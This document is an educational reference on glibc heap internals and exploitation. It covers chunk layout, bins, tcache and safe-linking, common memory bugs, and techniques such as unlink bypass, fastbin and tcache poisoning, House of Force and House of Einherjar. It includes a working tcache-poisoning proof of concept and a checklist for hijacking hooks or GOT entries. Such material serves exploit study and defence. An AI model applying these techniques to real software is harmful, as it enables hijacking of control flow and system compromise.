Heap Internals & Exploitation
Deep reference on glibc ptmalloc2: chunk layout, free bins, tcache, safe-linking, UAF, double-free, heap overflow, and modern exploitation techniques.
The heap is the primary arena for dynamic memory in C and C++ programs. Most exploitation techniques at the heap layer abuse the allocator's unconditional trust of its own metadata — a trust you can violate through out-of-bounds writes, use-after-free, or double-free bugs.
These notes focus on glibc ptmalloc2, the allocator on most Linux systems. Concepts carry over to jemalloc and tcmalloc with varying details.
Quick Reference
1. Chunk Anatomy
Every malloc call returns a pointer into the user region of a chunk. Directly before that pointer sits the chunk header managed — and trusted — by the allocator.
In-use chunk layout
(end of previous chunk's user data)
┌─────────────────────────────────────┐
│ prev_size (8 B) │ ← reused as user data when prev is in-use
│ size | flags (8 B) │ ← size of THIS chunk; 3 flags in low bits
├─────────────────────────────────────┤ ← malloc() returns pointer HERE ↓
│ │
│ user data (size − 16 B) │
│ │
└─────────────────────────────────────┘
(next chunk's prev_size starts here)
Free chunk — additional fields
┌─────────────────────────────────────┐
│ prev_size (8 B) │
│ size | flags (8 B) │
├─────────────────────────────────────┤
│ fd → next free chunk │
│ bk → prev free chunk │
│ fd_nextsize (large bin only) │
│ bk_nextsize (large bin only) │
└─────────────────────────────────────┘
Size flags (low 3 bits of size)
- PREV_INUSE (0x1) — set when the previous chunk is allocated; clear means prev_size is valid and the previous chunk is free
- IS_MMAPPED (0x2) — chunk was obtained via mmap and bypasses the bins entirely
- NON_MAIN_ARENA (0x4) — chunk belongs to a secondary (thread) arena
Because the next chunk's size field sits immediately after the current chunk's user data, even a one-byte overflow (e.g., writing a null terminator past a string buffer) can flip that chunk's PREV_INUSE bit, tricking the allocator into a dangerous backward consolidation.
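A minimal sketch of that scenario; the buffer sizes are illustrative, not taken from the notes above:
char *name = malloc(24);                    /* chunk size 0x20; 24 usable bytes     */
char *peer = malloc(240);                   /* adjacent chunk, header follows name   */
strcpy(name, "AAAAAAAAAAAAAAAAAAAAAAAA");   /* 24 'A's + '\0' = 25 bytes written     */
/* The terminating '\0' lands on peer's size field (0x101 → 0x100), clearing
   PREV_INUSE. A later free(peer) will trust the forged prev_size and
   consolidate backwards into attacker-influenced memory. */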
2. Free Bins
After free(p), glibc places the chunk into one of five bin structures — checked in order during the next malloc:
Tcache (glibc ≥ 2.26)
- Per-thread, no lock
- 64 bins for sizes 24–1032 B (16-B steps)
- Max 7 entries per bin (count enforced)
- Singly linked — only fd
- Checked first on both alloc and free
Fastbins
- Sizes ≤ 64 B (default); up to 80 B
- 10 singly-linked LIFO bins
- No coalescing (speed trade-off)
- Consolidated only on malloc_consolidate()
Unsorted bin
- Single circular doubly-linked list
- First stop for non-fast freed chunks
- Chunks sorted into small/large bins on the next malloc scan
Small bins
- 62 bins, sizes 16–504 B
- Doubly-linked FIFO (exact-size match)
- Chunks coalesce with neighbours on free
Large bins
- 63 bins for sizes ≥ 512 B
- Doubly linked + size-sorted (best-fit)
- Extra fd_nextsize / bk_nextsize skip-list chains
Top chunk (wilderness)
- Last resort — extend heap via sbrk/mmap
- Always at the high end of the arena
- No prior free chunk to coalesce backwards with
malloc lookup order
malloc(n):
1. tcache[size_class] → O(1) thread-local pop (≥ 2.26)
2. fastbin[size_class] → O(1) if size ≤ fast threshold
3. small bin[size_class] → exact fit, doubly-linked pop
4. unsorted bin → linear scan; splits oversized chunks
5. large bin → best-fit in a size-sorted list
6. top chunk → carve from wilderness, or sbrk/mmap
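A tiny experiment (ours, not from the original notes) makes step 1 visible: on glibc ≥ 2.26 a freed chunk of the same size class comes straight back from tcache.
#include <assert.h>
#include <stdlib.h>

int main(void) {
    void *a = malloc(24);
    free(a);               /* chunk parked in the tcache bin for 0x20 chunks */
    void *b = malloc(24);  /* lookup step 1: O(1) tcache pop                 */
    assert(a == b);        /* same address is recycled immediately           */
    return 0;
}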
3. Tcache Deep Dive (glibc ≥ 2.26)
Tcache is a per-thread, lock-free singly-linked cache that makes small allocations near-free in latency. Its initial design lacked almost all integrity checks — making it the dominant exploitation target for several years.
Internal structures
typedef struct tcache_entry {
struct tcache_entry *next; /* singly linked */
struct tcache_perthread_struct *key; /* 2.29+: double-free canary */
} tcache_entry;
typedef struct tcache_perthread_struct {
uint16_t counts[TCACHE_MAX_BINS]; /* entries per bin (max 7) */
tcache_entry *entries[TCACHE_MAX_BINS]; /* head of each bin */
} tcache_perthread_struct;
The tcache_perthread_struct itself lives at the very start of the heap, allocated by malloc during thread initialisation. Corrupting it gives complete control over all future small allocations.
put / get (simplified)
static void tcache_put(mchunkptr chunk, size_t tc_idx) {
tcache_entry *e = chunk2mem(chunk);
e->key = tcache; /* 2.29+: tag for double-free check */
e->next = PROTECT_PTR(&e->next, /* 2.32+: safe-linking */
tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
static void *tcache_get(size_t tc_idx) {
tcache_entry *e = tcache->entries[tc_idx];
tcache->entries[tc_idx] = REVEAL_PTR(e->next);
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *)e;
}
Safe-linking (glibc ≥ 2.32)
The next pointer stored in tcache (and fastbin) entries is XOR-mangled with a secret derived from its own storage address:
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr))((((size_t)(pos)) >> 12) ^ ((size_t)(ptr))))
#define REVEAL_PTR(ptr) PROTECT_PTR(&ptr, ptr)
The slot address pos is right-shifted 12 bits (dropping the page offset) and XOR-ed with the pointer value. Forging a valid mangled pointer requires knowing the heap address of the slot — which demands a prior heap leak.
Leak workflow: read the next field of a freed chunk through a dangling pointer or OOB read — this leaks a mangled pointer. XOR it with slot_addr >> 12 to recover the raw heap address, then compute the correct mangled value for your forged pointer.
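A small helper sketch for that workflow; reveal() and mangle() are our names, and slot_addr / leaked are assumed to come from your own leak primitive:
#include <stdint.h>

/* Undo PROTECT_PTR: recover the raw heap pointer from a leaked next field. */
static uintptr_t reveal(uintptr_t slot_addr, uintptr_t leaked) {
    return (slot_addr >> 12) ^ leaked;
}

/* Forge the value to store so the allocator later "reveals" it as target. */
static uintptr_t mangle(uintptr_t slot_addr, uintptr_t target) {
    return (slot_addr >> 12) ^ target;
}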
4. Allocator Mitigations
- Tcache key check (glibc ≥ 2.29): tcache_entry.key is set to the tcache header pointer on free; if the same pattern is seen on re-entry, abort() is called.
- Safe-linking (≥ 2.32): next pointers are XOR'd with a slot-derived secret. Forging a pointer requires a heap address leak.
- Tcache counts: tcache->counts[i] is incremented on put and decremented on get. Underflow or overflow triggers abort.
- Alignment check: in tcache_get the returned pointer must be MIN_CHUNK_SIZE-aligned. Misalignment aborts.
- Unlink integrity check: fd->bk == chunk and bk->fd == chunk are verified before relinking. The classic write-what-where now aborts unless you control both pointers.
5. Bug Classes
Uninitialized use
Reading fields of a freshly malloc'd object before writing them. Heap memory is not zeroed by malloc.
typedef struct { int len; char *buf; } Msg;
Msg *m = malloc(sizeof *m);
printf("%d\n", m->len); // UB: reading stale bytes from a prior allocationcalloc or explicit memset when zero-initialization matters.Unchecked malloc return
Unchecked malloc return
char *p = malloc(n);
memcpy(p, src, n); // segfault — or null-pointer write — if p == NULL
On modern Linux, mmap_min_addr prevents null-page mapping in userspace, so a null dereference is typically just a crash. In the kernel or embedded contexts it may be exploitable.
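The corresponding defensive pattern is a one-line check (a sketch; how the failure is handled is up to the caller):
char *p = malloc(n);
if (p == NULL) {
    perror("malloc");
    return -1;             /* or abort(), or retry with a smaller request */
}
memcpy(p, src, n);         /* safe: p is known to be non-NULL here */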
Use-after-free (UAF)
char *a = malloc(16);
free(a);
a[2] = 0x41; // UAF write — 'a' is now on the tcache free list
Timeline:
t0 malloc(16) → 0xADDR allocate
t1 use(0xADDR)
t2 free(0xADDR) chunk goes to tcache/fastbin
t3 malloc(16) → 0xADDR SAME region returned to a second caller
t4 a[2] = 0x41 clobbers the second caller's object
Stack variant — use-after-return:
char *bad(void) {
char local[16];
return local; // pointer to a stack frame that no longer exists
}
Common follow-on primitives once you hold a dangling pointer:
- Type confusion — free an object of type A, reallocate as type B at the same address, then use A's dangling pointer to reach B's fields.
- Pointer hijack — if the freed object contained a function pointer or vtable, overwrite it via the dangling pointer (sketched below).
- Metadata leak — a freed chunk's fd/bk now hold heap (or libc) addresses; read them through the dangling pointer for a leak.
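A compact sketch of the pointer-hijack pattern; Handler, evil(), and demo() are hypothetical names used only for illustration:
typedef struct { void (*cb)(void); char tag[24]; } Handler;

static void evil(void) { puts("hijacked"); }

void demo(void) {
    Handler *h = malloc(sizeof *h);     /* 0x30-sized chunk                 */
    free(h);                            /* h left dangling on the tcache    */
    void **reuse = malloc(sizeof *h);   /* same chunk handed straight back  */
    reuse[0] = (void *)evil;            /* overwrites the old cb slot       */
    h->cb();                            /* UAF call through a hijacked ptr  */
}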
Double free
free(p);
if (error_condition)
free(p); // double free — corrupts the tcache / fastbin list
In tcache before glibc 2.29 (no key check), this directly creates a cycle:
tcache bin (size class): p → p → p → … (self-referential)
malloc(sz) → p (pop first entry)
malloc(sz) → p (same address again — two owners of one allocation)
Set pointers to NULL immediately after freeing them; free(NULL) is defined as a no-op. Adopt clear ownership semantics so exactly one code path frees each allocation.
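One way to encode that discipline (the macro name is ours):
#define FREE_AND_NULL(p) do { free(p); (p) = NULL; } while (0)

FREE_AND_NULL(p);
if (error_condition)
    FREE_AND_NULL(p);    /* second call is free(NULL), a defined no-op */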
Memory leak
for (int i = 0; i < N; i++) {
char *buf = malloc(1 << 20); // 1 MiB
process(buf);
/* forgot: free(buf) */
}
// RSS grows unbounded; heap becomes fragmented
Leaks rarely cause direct exploitability but degrade availability (OOM) and may let an attacker indirectly shape heap layout for later exploitation.
Heap overflow
Non-exploitable layout — overflow lands in the top chunk:
char *buf = malloc(1024);
strcpy(buf, argv[1]); // overflow goes into wilderness; no free-list corruption
Exploitable layout — two adjacent allocations:
char *buf = malloc(1024);
char *buf2 = malloc(1024); // typically placed immediately after buf
strcpy(buf, argv[1]); // overflow lands on buf2's chunk header
free(buf2); // allocator consults the corrupted header
What even a single-byte overflow can achieve:
- Flip PREV_INUSE → trigger a false backward consolidation
- Overwrite size → misalign future allocations
- Plant fake fd/bk → write-what-where on unlink (older glibc)
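Going back to the strcpy layout above, the defensive counterpart is to make the copy length explicit (a sketch; strnlen is POSIX):
char *buf = malloc(1024);
if (buf) {
    size_t n = strnlen(argv[1], 1023);   /* leave room for the terminator   */
    memcpy(buf, argv[1], n);
    buf[n] = '\0';                        /* cannot spill into buf2's header */
}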
6. Exploitation Techniques
Classic Unlink / Frontlink
Precondition: Heap overflow into a free chunk's fd/bk fields.
Forge Y.fd = &WRITEVAL
Forge Y.bk = &TARGET − 0x10 (so bk→fd lands on TARGET)
unlink(Y):
fd→bk = bk → *(TARGET) = WRITEVAL ← arbitrary write
bk→fd = fd → *(WRITEVAL+8) = &TARGET-8
A write-what-where primitive. Patched in glibc 2.3.4 with the consistency check fd→bk == chunk && bk→fd == chunk.
Modern bypass: given a known pointer P that holds the address of the fake chunk (for example, a global slot that stores your allocation), set fd = P − 0x18 and bk = P − 0x10. Then fd→bk and bk→fd both resolve to the fake chunk, passing the check.
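The pointer arithmetic, sketched for 64-bit; FAKE and P stand for addresses you already control or have leaked:
/* chunk field offsets: prev_size 0x00, size 0x08, fd 0x10, bk 0x18 */
uint64_t *fake = (uint64_t *)FAKE;
fake[2] = (uint64_t)P - 0x18;   /* fd: fd->bk == *P == FAKE (check passes) */
fake[3] = (uint64_t)P - 0x10;   /* bk: bk->fd == *P == FAKE (check passes) */
/* unlink(FAKE) then performs *P = P - 0x18: P now points just before
   itself, the write primitive the integrity check was meant to stop */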
Fastbin Corruption
Precondition: UAF or double-free on a fastbin-sized chunk.
Step 1 free(A) → fastbin: [ A → NULL ]
Step 2 free(B), then free(A) again → fastbin: [ A → B → A ] (the double-free check only compares A against the current bin head, so the interleaved free(B) slips past it)
Step 3 malloc(sz) → returns A; write A.fd = FAKE − 8
Step 4 malloc(sz) ×2 → returns B, then A again (drain)
Step 5 malloc(sz) → returns FAKE (allocator treats FAKE as a valid chunk)
Use step 5 to write into FAKE — typically __malloc_hook, __free_hook, or a GOT entry. The fake chunk's size field must also match the fastbin's size class, which is why exploits classically hunt for a stray 0x7f byte near __malloc_hook to serve as a fake size.
Tcache Dup / Poisoning
Before glibc 2.32 (no safe-linking):
free(A) → tcache: [ A ]
free(A) → tcache: [ A → A ]
malloc(sz) → A write A->next = &TARGET
malloc(sz) → A (drain the duplicate)
malloc(sz) → TARGET allocator hands us the target address as "fresh" memory
With safe-linking (≥ 2.32), step 3 requires a mangled pointer:
size_t slot = (size_t)&A->next;
A->next = (tcache_entry *)((slot >> 12) ^ (size_t)&TARGET);
This requires knowing &A->next, which is obtained from a heap address leak.
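A self-contained sketch (ours) that poisons its own tcache on a safe-linking glibc (≥ 2.32) and makes malloc return a static buffer; the benign target array stands in for __free_hook or any other goal. On earlier glibc the XOR step is simply omitted.
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

static _Alignas(16) char target[0x30];      /* benign stand-in for a real target */

int main(void) {
    void *a = malloc(0x28);
    void *b = malloc(0x28);
    free(b);
    free(a);                                /* tcache (0x30 class): a → b        */

    /* Simulated UAF write: forge a's next pointer with safe-linking mangling.   */
    uintptr_t slot = (uintptr_t)a;          /* address of a's next field         */
    *(uintptr_t *)a = (slot >> 12) ^ (uintptr_t)target;

    malloc(0x28);                           /* pops a                            */
    void *win = malloc(0x28);               /* pops the forged entry             */
    printf("malloc returned %p, target is at %p\n", win, (void *)target);
    return 0;
}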
House of Force (pre-glibc 2.29)
Precondition: Overflow into the top chunk's size field.
1. Overwrite top->size = 0xffffffffffffffff
2. malloc(req) where req wraps 64-bit arithmetic to place the new
top pointer at TARGET − 2*sizeof(size_t)
3. The following malloc(any) returns TARGET — arbitrary allocation
Mitigated in glibc 2.29: top chunk size is sanity-checked against arena bounds.
House of Einherjar
Precondition: Off-by-one null-byte overflow into the low byte of the next chunk's size (clearing PREV_INUSE) and the ability to forge a fake free chunk somewhere in memory.
1. Plant fake chunk header at address FAKE
2. Off-by-one: clear PREV_INUSE of next chunk; set its prev_size = distance to FAKE
3. free(next chunk) → backward consolidate lands at FAKE
4. malloc(N) → returns chunk overlapping FAKE + live adjacent object
(overlap gives read/write over the adjacent object)
Heap Spray
Allocate many same-size objects to deterministically fill bins and predict heap layout:
void *spray[256];
for (int i = 0; i < 256; i++)
spray[i] = malloc(sz); // fill tcache + fastbins
for (int i = 0; i < 256; i++)
free(spray[i]); // drain — next alloc is at a known address
Turns a probabilistic exploit into a reliable one. Essential when ASLR is active.
7. Tooling
- Valgrind: valgrind --leak-check=full ./bin
- Sanitizers: compile with -fsanitize=address,undefined -g
- pwndbg / GEF: heap / bins / vis_heap_chunks
- glibc built-in stats: malloc_stats(); /* writes to stderr */
- libdislocator: LD_PRELOAD=libdislocator.so ./bin
- pwndbg> heapinfo
Essential pwndbg commands
heap walk all chunks in the main arena
bins show fastbins, unsorted, small, large bins
tcachebins dump per-thread tcache entries + counts
vis_heap_chunks N color-coded visual map of N chunks
find_fake_fast ADDR find memory that looks like a valid fastbin chunk
malloc_chunk ADDR parse chunk header at ADDR
try_free ADDR simulate a free() call to check what glibc would do
Attack Checklist
- Identify the primitive — overflow / UAF / double-free / type confusion
- Leak addresses — read a freed chunk's fd/bk (unsorted bin → libc leak) or a tcache pointer (heap leak)
- Shape the heap — spray/drain to control chunk adjacency and bin state
- Corrupt a free-list pointer — redirect the next allocation to a target region (GOT, hook, vtable)
- Write your payload — overwrite __free_hook, __malloc_hook, a GOT entry, or a C++ vtable pointer
- Trigger — call the overwritten hook/function to gain control flow